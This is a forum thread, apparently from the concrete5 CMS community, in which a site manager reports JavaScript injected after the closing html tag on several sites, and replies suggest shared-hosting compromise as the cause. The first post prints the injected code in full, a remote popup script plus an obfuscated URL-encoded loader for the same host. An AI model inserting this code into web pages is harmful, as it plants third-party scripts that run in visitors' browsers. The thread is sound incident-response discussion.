Injection of Javascript after closing HTML tag
Permalink
Hi all!
I have experienced a breach of multiple C5 sites that I manage. The following code has been injected after the on multiple sites on different installations of C5.
The code is:
Does anyone else have an experience of this or any idea how this breach could have happened on my sites.
Thanks
Simon.
I have experienced a breach of multiple C5 sites that I manage. The following code has been injected after the
</html>
The code is:
<script type="text/javascript" src="http://yllix.com/popup.php?pub=224111§ion=General&ga=g&show=20"></script> <script language="javascript"> document.write( unescape( '%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%79%6C%6C%69%78%2E%63%6F%6D%2F%70%6F%70%75%70%2E%70%68%70%3F%70%75%62%3D%32%32%34%31%31%31%26%73%65%63%74%69%6F%6E%3D%47%65%6E%65%72%61%6C%26%67%61%3D%67%26%73%68%6F%77%3D%32%30%22%3E%3C%2F%73%63%72%69%70%74%3E' ) ); </script>
Does anyone else have an experience of this or any idea how this breach could have happened on my sites.
Thanks
Simon.
The only time I've seen a concrete5 site affected by a hack such as this is when another application is sharing the same hosting account and that application is used as an attack vector - via such an exploit the scripts tend to just broadly scan and target common files names like index.php, index.html, home.php, etc, and append extra code at the bottom (sometimes with lots of whitespace about it to try to hide it). They sometimes target .htaccess files as well. They add changes that would work on any php script, not just concrete5.
If you host a whole bunch of sites on under one hosting account ('add-on domains' in cPanel), if there is an exploit in any of them, all sites may be affected in this way.
So it's worth having a look if you've got other sites on the same hosting space, like blogs, wikis, old versions of Joomla - stuff that ISN'T concrete5.
I've personally never see a concrete5 website just sitting by itself modified/hacked (and I hope that it stays that way!).
If you host a whole bunch of sites on under one hosting account ('add-on domains' in cPanel), if there is an exploit in any of them, all sites may be affected in this way.
So it's worth having a look if you've got other sites on the same hosting space, like blogs, wikis, old versions of Joomla - stuff that ISN'T concrete5.
I've personally never see a concrete5 website just sitting by itself modified/hacked (and I hope that it stays that way!).
It's not usually a good idea to post links that hackers injected into your scripts without removing the php file from the link. Curious folks visiting this thread might visit the link you posted and trouble might ensue.